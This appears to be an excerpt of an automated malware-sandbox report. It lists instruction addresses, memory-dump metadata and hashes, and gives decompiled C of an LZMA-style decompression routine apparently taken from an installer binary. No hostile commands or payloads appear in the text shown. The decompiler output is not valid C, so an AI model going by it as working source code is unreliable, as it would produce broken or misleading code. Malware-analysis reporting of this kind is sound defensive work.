                                                                            0x004069db
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069dd
                                                                            0x004069e0
                                                                            0x004069e3
                                                                            0x004069e3
                                                                            0x004069e6
                                                                            0x004069e9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069ef
                                                                            0x004069f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069fb
                                                                            0x004069fb
                                                                            0x004069ff
                                                                            0x00406a02
                                                                            0x00406a05
                                                                            0x00406a08
                                                                            0x00406a0b
                                                                            0x00406a0c
                                                                            0x00406a0f
                                                                            0x00406a11
                                                                            0x00406a17
                                                                            0x00406a1a
                                                                            0x00406a1d
                                                                            0x00406a20
                                                                            0x00406a23
                                                                            0x00406a26
                                                                            0x00406a29
                                                                            0x00406a45
                                                                            0x00406a48
                                                                            0x00406a4b
                                                                            0x00406a4e
                                                                            0x00406a55
                                                                            0x00406a59
                                                                            0x00406a5b
                                                                            0x00406a5f
                                                                            0x00406a2b
                                                                            0x00406a2b
                                                                            0x00406a2f
                                                                            0x00406a37
                                                                            0x00406a3c
                                                                            0x00406a3e
                                                                            0x00406a40
                                                                            0x00406a40
                                                                            0x00406a62
                                                                            0x00406a69
                                                                            0x00406a6c
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a72
                                                                            0x00000000
                                                                            0x00406a77
                                                                            0x00406a77
                                                                            0x00406a7b
                                                                            0x0040713b
                                                                            0x00000000
                                                                            0x0040713b
                                                                            0x00406a81
                                                                            0x00406a84
                                                                            0x00406a87
                                                                            0x00406a8b
                                                                            0x00406a8e
                                                                            0x00406a94
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a96
                                                                            0x00406a99
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406a9c
                                                                            0x00406aa2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406aa4
                                                                            0x00406aa7
                                                                            0x00406aaa
                                                                            0x00406aad
                                                                            0x00406ab0
                                                                            0x00406ab3
                                                                            0x00406ab6
                                                                            0x00406ab9
                                                                            0x00406abc
                                                                            0x00406abf
                                                                            0x00406ac2
                                                                            0x00406ada
                                                                            0x00406add
                                                                            0x00406ae0
                                                                            0x00406ae3
                                                                            0x00406ae3
                                                                            0x00406ae6
                                                                            0x00406aea
                                                                            0x00406aec
                                                                            0x00406ac4
                                                                            0x00406ac4
                                                                            0x00406acc
                                                                            0x00406ad1
                                                                            0x00406ad3
                                                                            0x00406ad5
                                                                            0x00406ad5
                                                                            0x00406aef
                                                                            0x00406af6
                                                                            0x00406af9
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00000000
                                                                            0x00406afb
                                                                            0x00406af9
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00406b00
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b3b
                                                                            0x00406b3b
                                                                            0x00406b3f
                                                                            0x00407147
                                                                            0x00000000
                                                                            0x00407147
                                                                            0x00406b45
                                                                            0x00406b48
                                                                            0x00406b4b
                                                                            0x00406b4f
                                                                            0x00406b52
                                                                            0x00406b58
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5a
                                                                            0x00406b5d
                                                                            0x00406b60
                                                                            0x00406b60
                                                                            0x00406b66
                                                                            0x00406b04
                                                                            0x00406b04
                                                                            0x00406b07
                                                                            0x00000000
                                                                            0x00406b07
                                                                            0x00406b68
                                                                            0x00406b68
                                                                            0x00406b6b
                                                                            0x00406b6e
                                                                            0x00406b71
                                                                            0x00406b74
                                                                            0x00406b77
                                                                            0x00406b7a
                                                                            0x00406b7d
                                                                            0x00406b80
                                                                            0x00406b83
                                                                            0x00406b86
                                                                            0x00406b9e
                                                                            0x00406ba1
                                                                            0x00406ba4
                                                                            0x00406ba7
                                                                            0x00406ba7
                                                                            0x00406baa
                                                                            0x00406bae
                                                                            0x00406bb0
                                                                            0x00406b88
                                                                            0x00406b88
                                                                            0x00406b90
                                                                            0x00406b95
                                                                            0x00406b97
                                                                            0x00406b99
                                                                            0x00406b99
                                                                            0x00406bb3
                                                                            0x00406bba
                                                                            0x00406bbd
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406bbf
                                                                            0x00000000
                                                                            0x00406e4c
                                                                            0x00406e4c
                                                                            0x00406e50
                                                                            0x00407177
                                                                            0x00000000
                                                                            0x00407177
                                                                            0x00406e56
                                                                            0x00406e59
                                                                            0x00406e5c
                                                                            0x00406e60
                                                                            0x00406e63
                                                                            0x00406e69
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6b
                                                                            0x00406e6e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c1c
                                                                            0x00406c1c
                                                                            0x00406c1f
                                                                            0x00406f91
                                                                            0x00406f91
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407018
                                                                            0x0040701c
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x0040703a
                                                                            0x00407041
                                                                            0x00407048
                                                                            0x00000000
                                                                            0x00407048
                                                                            0x0040701e
                                                                            0x00407021
                                                                            0x00407024
                                                                            0x00407027
                                                                            0x0040702e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407109
                                                                            0x0040710c
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d43
                                                                            0x00406d45
                                                                            0x00406d4c
                                                                            0x00406d4d
                                                                            0x00406d4f
                                                                            0x00406d52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d5a
                                                                            0x00406d5d
                                                                            0x00406d60
                                                                            0x00406d62
                                                                            0x00406d64
                                                                            0x00406d64
                                                                            0x00406d65
                                                                            0x00406d68
                                                                            0x00406d6f
                                                                            0x00406d72
                                                                            0x00406d80
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00407065
                                                                            0x00407065
                                                                            0x00407069
                                                                            0x004071a1
                                                                            0x00000000
                                                                            0x004071a1
                                                                            0x0040706f
                                                                            0x00407072
                                                                            0x00407075
                                                                            0x00407079
                                                                            0x0040707c
                                                                            0x00407082
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407084
                                                                            0x00407087
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x0040708a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d88
                                                                            0x00406d8b
                                                                            0x00406dc1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef1
                                                                            0x00406ef4
                                                                            0x00406ef4
                                                                            0x00406ef7
                                                                            0x00406ef9
                                                                            0x00407183
                                                                            0x00000000
                                                                            0x00407183
                                                                            0x00406eff
                                                                            0x00406f02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f08
                                                                            0x00406f0c
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00406f0f
                                                                            0x00000000
                                                                            0x00406f0f
                                                                            0x00406d8d
                                                                            0x00406d8f
                                                                            0x00406d91
                                                                            0x00406d93
                                                                            0x00406d96
                                                                            0x00406d97
                                                                            0x00406d99
                                                                            0x00406d9b
                                                                            0x00406d9e
                                                                            0x00406da1
                                                                            0x00406db7
                                                                            0x00406dbc
                                                                            0x00406df4
                                                                            0x00406df4
                                                                            0x00406df8
                                                                            0x00406e24
                                                                            0x00406e26
                                                                            0x00406e2d
                                                                            0x00406e30
                                                                            0x00406e33
                                                                            0x00406e33
                                                                            0x00406e38
                                                                            0x00406e38
                                                                            0x00406e3a
                                                                            0x00406e3d
                                                                            0x00406e44
                                                                            0x00406e47
                                                                            0x00406e74
                                                                            0x00406e74
                                                                            0x00406e77
                                                                            0x00406e7a
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00406eee
                                                                            0x00000000
                                                                            0x00406eee
                                                                            0x00406e7c
                                                                            0x00406e82
                                                                            0x00406e85
                                                                            0x00406e88
                                                                            0x00406e8b
                                                                            0x00406e8e
                                                                            0x00406e91
                                                                            0x00406e94
                                                                            0x00406e97
                                                                            0x00406e9a
                                                                            0x00406e9d
                                                                            0x00406eb6
                                                                            0x00406eb8
                                                                            0x00406ebb
                                                                            0x00406ebc
                                                                            0x00406ebf
                                                                            0x00406ec1
                                                                            0x00406ec4
                                                                            0x00406ec6
                                                                            0x00406ec8
                                                                            0x00406ecb
                                                                            0x00406ecd
                                                                            0x00406ed0
                                                                            0x00406ed4
                                                                            0x00406ed6
                                                                            0x00406ed6
                                                                            0x00406ed7
                                                                            0x00406eda
                                                                            0x00406edd
                                                                            0x00406e9f
                                                                            0x00406e9f
                                                                            0x00406ea7
                                                                            0x00406eac
                                                                            0x00406eae
                                                                            0x00406eb1
                                                                            0x00406eb1
                                                                            0x00406ee0
                                                                            0x00406ee7
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00406e71
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00000000
                                                                            0x00406ee9
                                                                            0x00406ee7
                                                                            0x00406dfa
                                                                            0x00406dfd
                                                                            0x00406dff
                                                                            0x00406e02
                                                                            0x00406e05
                                                                            0x00406e08
                                                                            0x00406e0a
                                                                            0x00406e0d
                                                                            0x00406e10
                                                                            0x00406e10
                                                                            0x00406e13
                                                                            0x00406e13
                                                                            0x00406e16
                                                                            0x00406e1d
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00406df1
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00000000
                                                                            0x00406e1f
                                                                            0x00406e1d
                                                                            0x00406da3
                                                                            0x00406da6
                                                                            0x00406da8
                                                                            0x00406dab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406b0a
                                                                            0x00406b0a
                                                                            0x00406b0e
                                                                            0x00407153
                                                                            0x00000000
                                                                            0x00407153
                                                                            0x00406b14
                                                                            0x00406b17
                                                                            0x00406b1a
                                                                            0x00406b1d
                                                                            0x00406b20
                                                                            0x00406b23
                                                                            0x00406b26
                                                                            0x00406b28
                                                                            0x00406b2b
                                                                            0x00406b2e
                                                                            0x00406b31
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00406b33
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c95
                                                                            0x00406c95
                                                                            0x00406c99
                                                                            0x0040715f
                                                                            0x00000000
                                                                            0x0040715f
                                                                            0x00406c9f
                                                                            0x00406ca2
                                                                            0x00406ca5
                                                                            0x00406ca8
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406caa
                                                                            0x00406cad
                                                                            0x00406cb0
                                                                            0x00406cb3
                                                                            0x00406cb6
                                                                            0x00406cb9
                                                                            0x00406cbc
                                                                            0x00406cbd
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cbf
                                                                            0x00406cc2
                                                                            0x00406cc5
                                                                            0x00406cc8
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406ccb
                                                                            0x00406cce
                                                                            0x00406cd0
                                                                            0x00406cd0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f12
                                                                            0x00406f16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f1c
                                                                            0x00406f1f
                                                                            0x00406f22
                                                                            0x00406f25
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f27
                                                                            0x00406f2a
                                                                            0x00406f2d
                                                                            0x00406f30
                                                                            0x00406f33
                                                                            0x00406f36
                                                                            0x00406f39
                                                                            0x00406f3a
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3c
                                                                            0x00406f3f
                                                                            0x00406f42
                                                                            0x00406f45
                                                                            0x00406f48
                                                                            0x00406f4b
                                                                            0x00406f4f
                                                                            0x00406f51
                                                                            0x00406f54
                                                                            0x00000000
                                                                            0x00406f56
                                                                            0x00406cd3
                                                                            0x00406cd3
                                                                            0x00000000
                                                                            0x00406cd3
                                                                            0x00406f54
                                                                            0x00407189
                                                                            0x004071ab
                                                                            0x004071b1
                                                                            0x004071b3
                                                                            0x004071ba
                                                                            0x004071bc
                                                                            0x004071c3
                                                                            0x004071c7
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x004071c0
                                                                            0x004071c0
                                                                            0x00000000
                                                                            0x004071c0
                                                                            0x0040700d
                                                                            0x00407093
                                                                            0x00407099
                                                                            0x0040709c
                                                                            0x0040709f
                                                                            0x004070a2
                                                                            0x004070a5
                                                                            0x004070a8
                                                                            0x004070ab
                                                                            0x004070ae
                                                                            0x004070b4
                                                                            0x004070cd
                                                                            0x004070d0
                                                                            0x004070d3
                                                                            0x004070d6
                                                                            0x004070da
                                                                            0x004070dc
                                                                            0x004070dd
                                                                            0x004070e0
                                                                            0x004070b6
                                                                            0x004070b6
                                                                            0x004070be
                                                                            0x004070c3
                                                                            0x004070c5
                                                                            0x004070c8
                                                                            0x004070c8
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x00000000
                                                                            0x004070ec
                                                                            0x004070ea
                                                                            0x00000000
                                                                            0x00406f5f

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                                            • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                                                                            • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                                            • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
